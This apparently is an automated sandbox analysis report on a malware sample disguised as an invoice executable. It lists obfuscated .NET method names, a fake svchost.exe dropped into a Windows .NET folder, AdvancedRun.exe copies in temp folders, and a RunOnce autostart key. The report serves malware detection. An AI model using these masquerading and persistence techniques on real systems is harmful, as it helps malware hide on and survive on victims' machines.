        Source: 0.0.CN-Invoice-XXXXX9808-19011143287994.exe.bf0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/AODZEGwanfkZGKWvOxVwRSKAhtZQhjcONlJOEMBbVyHgI.cs High entropy of concatenated method names: '.ctor', 'ZOIAuTDzvepzQwMhyaTeFgGQeEfNnQ', 'VbSZTfAXhrzpxlwCRrthPLYTuHbJqpyMh', 'otxYxTbXdMEpIuBMOugakdZEldQGRTNhj', 'SYEuyrjMYlp', 'eYHpOCKsbnj', 'uYSHYhxVTQizCwWspcXomSKAmwBRpjvgV', 'IEFCQtbpdryWzeTRkupeZXBosvBFGJvbDTRrPzJVZjAl', 'DMrIaePfbWLcqkvRvJxIdUWkbAuUGjaObcOIkXFBUpZGi', 'OaFeRzpMSiJQgGzKUzSVXbnvNHy'
        Source: 0.0.CN-Invoice-XXXXX9808-19011143287994.exe.bf0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ClozhVahMQiIfMWMokYSyGjWFqHhMP.cs High entropy of concatenated method names: 'MnmeUkqHYJrNM', 'IdSYiYMhvxsPV', 'XMUbhTkSpHBcsOxwAGZYwnriTExUfUdsdOfKzMfCMoswrV', '.ctor', '.cctor', 'ZCgSGCBYFhVDdAhNedpfjMtEUiqUOHZE', 'wvaPgZIGPTykPzhdkRhYCfnQM', 'nMtleQzWYHegXeHztSniPub', 'nJXzbrikdSmovLdZoQScWnT', 'crdLuCDyrsXuTZUWpWVTfRsdIPoTZCZqwewKYGNIzuVWxq'
        Source: 0.0.CN-Invoice-XXXXX9808-19011143287994.exe.bf0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/OYStTXRCRcNtDnwUJZlxjPavMKXcRQFbHOZtxzxYSQEcLXwqV.cs High entropy of concatenated method names: 'HPzugYXxHjZOLalisVzxBmzNzqZwtbM', '.ctor', 'ZBdlGdWMoyBPXceMwzRDTJuFb', 'LcfcyXihzOUbkbdNmKFqYQxRYXnfShyjUaQKPBtIyo', 'jKmxNPHZOodUFndzZlTtVNDbhdXCUeXqsjInMAj', 'ySsjfZvCHqBiOesvhkqKSfKq', 'NCvFQMybvVcvtVhIuVDCPBoRmgCjyGtNHTsxZXQ', 'EcgtipaOpjcxkBiBloEsKkpDPC', 'oNADKIxeYzIifBmrmawijmzrgiuFguN', 'DGanoMztZfDISdicgsXogGscoiwBoSXELf'
        Source: 0.0.CN-Invoice-XXXXX9808-19011143287994.exe.bf0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ZwEGqUraAhVRiqfTlGekeFGjZJen.cs High entropy of concatenated method names: 'AQugAsFnExIlQlIPGiGqTXCXlQtuPuHQeAKMPrPKSp', '.ctor', 'iNtTClrjsBjTJDXrwjKoIKRpYryDQJLgiE', 'WQwQjQUVMzkJOqkAKOnvxWeVlNsIQdL', 'eGhVFZTtMXrfpChtpYWSUjzUsVYdgDdJgXKcF', 'fOtTIAEYGIFucKTk', 'QUhmCJbQnjTIYrSxqKTizbBYqtpyLAtPWgPDQcvNDGzGWao', 'idsRLPtiWjuLsBIASclcUAHxuWubsutazp', 'IhCelqvuTbkf', 'QfdXdNnDLtqOurPCQtmcTAXNRUH'
        Source: 12.2.svchost.exe.a80000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/AODZEGwanfkZGKWvOxVwRSKAhtZQhjcONlJOEMBbVyHgI.cs High entropy of concatenated method names: '.ctor', 'ZOIAuTDzvepzQwMhyaTeFgGQeEfNnQ', 'VbSZTfAXhrzpxlwCRrthPLYTuHbJqpyMh', 'otxYxTbXdMEpIuBMOugakdZEldQGRTNhj', 'SYEuyrjMYlp', 'eYHpOCKsbnj', 'uYSHYhxVTQizCwWspcXomSKAmwBRpjvgV', 'IEFCQtbpdryWzeTRkupeZXBosvBFGJvbDTRrPzJVZjAl', 'DMrIaePfbWLcqkvRvJxIdUWkbAuUGjaObcOIkXFBUpZGi', 'OaFeRzpMSiJQgGzKUzSVXbnvNHy'
        Source: 12.2.svchost.exe.a80000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ClozhVahMQiIfMWMokYSyGjWFqHhMP.cs High entropy of concatenated method names: 'MnmeUkqHYJrNM', 'IdSYiYMhvxsPV', 'XMUbhTkSpHBcsOxwAGZYwnriTExUfUdsdOfKzMfCMoswrV', '.ctor', '.cctor', 'ZCgSGCBYFhVDdAhNedpfjMtEUiqUOHZE', 'wvaPgZIGPTykPzhdkRhYCfnQM', 'nMtleQzWYHegXeHztSniPub', 'nJXzbrikdSmovLdZoQScWnT', 'crdLuCDyrsXuTZUWpWVTfRsdIPoTZCZqwewKYGNIzuVWxq'
        Source: 12.2.svchost.exe.a80000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/OYStTXRCRcNtDnwUJZlxjPavMKXcRQFbHOZtxzxYSQEcLXwqV.cs High entropy of concatenated method names: 'HPzugYXxHjZOLalisVzxBmzNzqZwtbM', '.ctor', 'ZBdlGdWMoyBPXceMwzRDTJuFb', 'LcfcyXihzOUbkbdNmKFqYQxRYXnfShyjUaQKPBtIyo', 'jKmxNPHZOodUFndzZlTtVNDbhdXCUeXqsjInMAj', 'ySsjfZvCHqBiOesvhkqKSfKq', 'NCvFQMybvVcvtVhIuVDCPBoRmgCjyGtNHTsxZXQ', 'EcgtipaOpjcxkBiBloEsKkpDPC', 'oNADKIxeYzIifBmrmawijmzrgiuFguN', 'DGanoMztZfDISdicgsXogGscoiwBoSXELf'
        Source: 12.2.svchost.exe.a80000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ZwEGqUraAhVRiqfTlGekeFGjZJen.cs High entropy of concatenated method names: 'AQugAsFnExIlQlIPGiGqTXCXlQtuPuHQeAKMPrPKSp', '.ctor', 'iNtTClrjsBjTJDXrwjKoIKRpYryDQJLgiE', 'WQwQjQUVMzkJOqkAKOnvxWeVlNsIQdL', 'eGhVFZTtMXrfpChtpYWSUjzUsVYdgDdJgXKcF', 'fOtTIAEYGIFucKTk', 'QUhmCJbQnjTIYrSxqKTizbBYqtpyLAtPWgPDQcvNDGzGWao', 'idsRLPtiWjuLsBIASclcUAHxuWubsutazp', 'IhCelqvuTbkf', 'QfdXdNnDLtqOurPCQtmcTAXNRUH'
        Source: 12.0.svchost.exe.a80000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/AODZEGwanfkZGKWvOxVwRSKAhtZQhjcONlJOEMBbVyHgI.cs High entropy of concatenated method names: '.ctor', 'ZOIAuTDzvepzQwMhyaTeFgGQeEfNnQ', 'VbSZTfAXhrzpxlwCRrthPLYTuHbJqpyMh', 'otxYxTbXdMEpIuBMOugakdZEldQGRTNhj', 'SYEuyrjMYlp', 'eYHpOCKsbnj', 'uYSHYhxVTQizCwWspcXomSKAmwBRpjvgV', 'IEFCQtbpdryWzeTRkupeZXBosvBFGJvbDTRrPzJVZjAl', 'DMrIaePfbWLcqkvRvJxIdUWkbAuUGjaObcOIkXFBUpZGi', 'OaFeRzpMSiJQgGzKUzSVXbnvNHy'
        Source: 12.0.svchost.exe.a80000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ClozhVahMQiIfMWMokYSyGjWFqHhMP.cs High entropy of concatenated method names: 'MnmeUkqHYJrNM', 'IdSYiYMhvxsPV', 'XMUbhTkSpHBcsOxwAGZYwnriTExUfUdsdOfKzMfCMoswrV', '.ctor', '.cctor', 'ZCgSGCBYFhVDdAhNedpfjMtEUiqUOHZE', 'wvaPgZIGPTykPzhdkRhYCfnQM', 'nMtleQzWYHegXeHztSniPub', 'nJXzbrikdSmovLdZoQScWnT', 'crdLuCDyrsXuTZUWpWVTfRsdIPoTZCZqwewKYGNIzuVWxq'
        Source: 12.0.svchost.exe.a80000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/OYStTXRCRcNtDnwUJZlxjPavMKXcRQFbHOZtxzxYSQEcLXwqV.cs High entropy of concatenated method names: 'HPzugYXxHjZOLalisVzxBmzNzqZwtbM', '.ctor', 'ZBdlGdWMoyBPXceMwzRDTJuFb', 'LcfcyXihzOUbkbdNmKFqYQxRYXnfShyjUaQKPBtIyo', 'jKmxNPHZOodUFndzZlTtVNDbhdXCUeXqsjInMAj', 'ySsjfZvCHqBiOesvhkqKSfKq', 'NCvFQMybvVcvtVhIuVDCPBoRmgCjyGtNHTsxZXQ', 'EcgtipaOpjcxkBiBloEsKkpDPC', 'oNADKIxeYzIifBmrmawijmzrgiuFguN', 'DGanoMztZfDISdicgsXogGscoiwBoSXELf'
        Source: 12.0.svchost.exe.a80000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ZwEGqUraAhVRiqfTlGekeFGjZJen.cs High entropy of concatenated method names: 'AQugAsFnExIlQlIPGiGqTXCXlQtuPuHQeAKMPrPKSp', '.ctor', 'iNtTClrjsBjTJDXrwjKoIKRpYryDQJLgiE', 'WQwQjQUVMzkJOqkAKOnvxWeVlNsIQdL', 'eGhVFZTtMXrfpChtpYWSUjzUsVYdgDdJgXKcF', 'fOtTIAEYGIFucKTk', 'QUhmCJbQnjTIYrSxqKTizbBYqtpyLAtPWgPDQcvNDGzGWao', 'idsRLPtiWjuLsBIASclcUAHxuWubsutazp', 'IhCelqvuTbkf', 'QfdXdNnDLtqOurPCQtmcTAXNRUH'
        Source: 13.2.CasPol.exe.400000.0.unpack, #=qJT4I5hOweIk$xYFEeDszbikglXCuquUd$v9AXtyq2ns=.cs High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 13.2.CasPol.exe.400000.0.unpack, #=qWrm21vQ8CBMZP_RBTwpusA==.cs High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 19.2.svchost.exe.a0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/AODZEGwanfkZGKWvOxVwRSKAhtZQhjcONlJOEMBbVyHgI.cs High entropy of concatenated method names: '.ctor', 'ZOIAuTDzvepzQwMhyaTeFgGQeEfNnQ', 'VbSZTfAXhrzpxlwCRrthPLYTuHbJqpyMh', 'otxYxTbXdMEpIuBMOugakdZEldQGRTNhj', 'SYEuyrjMYlp', 'eYHpOCKsbnj', 'uYSHYhxVTQizCwWspcXomSKAmwBRpjvgV', 'IEFCQtbpdryWzeTRkupeZXBosvBFGJvbDTRrPzJVZjAl', 'DMrIaePfbWLcqkvRvJxIdUWkbAuUGjaObcOIkXFBUpZGi', 'OaFeRzpMSiJQgGzKUzSVXbnvNHy'
        Source: 19.2.svchost.exe.a0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ClozhVahMQiIfMWMokYSyGjWFqHhMP.cs High entropy of concatenated method names: 'MnmeUkqHYJrNM', 'IdSYiYMhvxsPV', 'XMUbhTkSpHBcsOxwAGZYwnriTExUfUdsdOfKzMfCMoswrV', '.ctor', '.cctor', 'ZCgSGCBYFhVDdAhNedpfjMtEUiqUOHZE', 'wvaPgZIGPTykPzhdkRhYCfnQM', 'nMtleQzWYHegXeHztSniPub', 'nJXzbrikdSmovLdZoQScWnT', 'crdLuCDyrsXuTZUWpWVTfRsdIPoTZCZqwewKYGNIzuVWxq'
        Source: 19.2.svchost.exe.a0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/OYStTXRCRcNtDnwUJZlxjPavMKXcRQFbHOZtxzxYSQEcLXwqV.cs High entropy of concatenated method names: 'HPzugYXxHjZOLalisVzxBmzNzqZwtbM', '.ctor', 'ZBdlGdWMoyBPXceMwzRDTJuFb', 'LcfcyXihzOUbkbdNmKFqYQxRYXnfShyjUaQKPBtIyo', 'jKmxNPHZOodUFndzZlTtVNDbhdXCUeXqsjInMAj', 'ySsjfZvCHqBiOesvhkqKSfKq', 'NCvFQMybvVcvtVhIuVDCPBoRmgCjyGtNHTsxZXQ', 'EcgtipaOpjcxkBiBloEsKkpDPC', 'oNADKIxeYzIifBmrmawijmzrgiuFguN', 'DGanoMztZfDISdicgsXogGscoiwBoSXELf'
        Source: 19.2.svchost.exe.a0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ZwEGqUraAhVRiqfTlGekeFGjZJen.cs High entropy of concatenated method names: 'AQugAsFnExIlQlIPGiGqTXCXlQtuPuHQeAKMPrPKSp', '.ctor', 'iNtTClrjsBjTJDXrwjKoIKRpYryDQJLgiE', 'WQwQjQUVMzkJOqkAKOnvxWeVlNsIQdL', 'eGhVFZTtMXrfpChtpYWSUjzUsVYdgDdJgXKcF', 'fOtTIAEYGIFucKTk', 'QUhmCJbQnjTIYrSxqKTizbBYqtpyLAtPWgPDQcvNDGzGWao', 'idsRLPtiWjuLsBIASclcUAHxuWubsutazp', 'IhCelqvuTbkf', 'QfdXdNnDLtqOurPCQtmcTAXNRUH'
        Source: 19.0.svchost.exe.a0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/AODZEGwanfkZGKWvOxVwRSKAhtZQhjcONlJOEMBbVyHgI.cs High entropy of concatenated method names: '.ctor', 'ZOIAuTDzvepzQwMhyaTeFgGQeEfNnQ', 'VbSZTfAXhrzpxlwCRrthPLYTuHbJqpyMh', 'otxYxTbXdMEpIuBMOugakdZEldQGRTNhj', 'SYEuyrjMYlp', 'eYHpOCKsbnj', 'uYSHYhxVTQizCwWspcXomSKAmwBRpjvgV', 'IEFCQtbpdryWzeTRkupeZXBosvBFGJvbDTRrPzJVZjAl', 'DMrIaePfbWLcqkvRvJxIdUWkbAuUGjaObcOIkXFBUpZGi', 'OaFeRzpMSiJQgGzKUzSVXbnvNHy'
        Source: 19.0.svchost.exe.a0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ClozhVahMQiIfMWMokYSyGjWFqHhMP.cs High entropy of concatenated method names: 'MnmeUkqHYJrNM', 'IdSYiYMhvxsPV', 'XMUbhTkSpHBcsOxwAGZYwnriTExUfUdsdOfKzMfCMoswrV', '.ctor', '.cctor', 'ZCgSGCBYFhVDdAhNedpfjMtEUiqUOHZE', 'wvaPgZIGPTykPzhdkRhYCfnQM', 'nMtleQzWYHegXeHztSniPub', 'nJXzbrikdSmovLdZoQScWnT', 'crdLuCDyrsXuTZUWpWVTfRsdIPoTZCZqwewKYGNIzuVWxq'
        Source: 19.0.svchost.exe.a0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/OYStTXRCRcNtDnwUJZlxjPavMKXcRQFbHOZtxzxYSQEcLXwqV.csHigh entropy of concatenated method names: 'HPzugYXxHjZOLalisVzxBmzNzqZwtbM', '.ctor', 'ZBdlGdWMoyBPXceMwzRDTJuFb', 'LcfcyXihzOUbkbdNmKFqYQxRYXnfShyjUaQKPBtIyo', 'jKmxNPHZOodUFndzZlTtVNDbhdXCUeXqsjInMAj', 'ySsjfZvCHqBiOesvhkqKSfKq', 'NCvFQMybvVcvtVhIuVDCPBoRmgCjyGtNHTsxZXQ', 'EcgtipaOpjcxkBiBloEsKkpDPC', 'oNADKIxeYzIifBmrmawijmzrgiuFguN', 'DGanoMztZfDISdicgsXogGscoiwBoSXELf'
        Source: 19.0.svchost.exe.a0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ZwEGqUraAhVRiqfTlGekeFGjZJen.csHigh entropy of concatenated method names: 'AQugAsFnExIlQlIPGiGqTXCXlQtuPuHQeAKMPrPKSp', '.ctor', 'iNtTClrjsBjTJDXrwjKoIKRpYryDQJLgiE', 'WQwQjQUVMzkJOqkAKOnvxWeVlNsIQdL', 'eGhVFZTtMXrfpChtpYWSUjzUsVYdgDdJgXKcF', 'fOtTIAEYGIFucKTk', 'QUhmCJbQnjTIYrSxqKTizbBYqtpyLAtPWgPDQcvNDGzGWao', 'idsRLPtiWjuLsBIASclcUAHxuWubsutazp', 'IhCelqvuTbkf', 'QfdXdNnDLtqOurPCQtmcTAXNRUH'

        Persistence and Installation Behavior:

        Drops PE files with benign system names
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe | File created: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe
        Drops executables to the windows directory (C:\Windows) and starts them
        Source: C:\Windows\explorer.exe | Executable created and started: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe | File created: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe

        Boot Survival:

        Creates an autostart registry key pointing to binary in C:\Windows
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CecuQrfmvIJuvYmbY
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe | Code function: 3_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe | Code function: 3_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
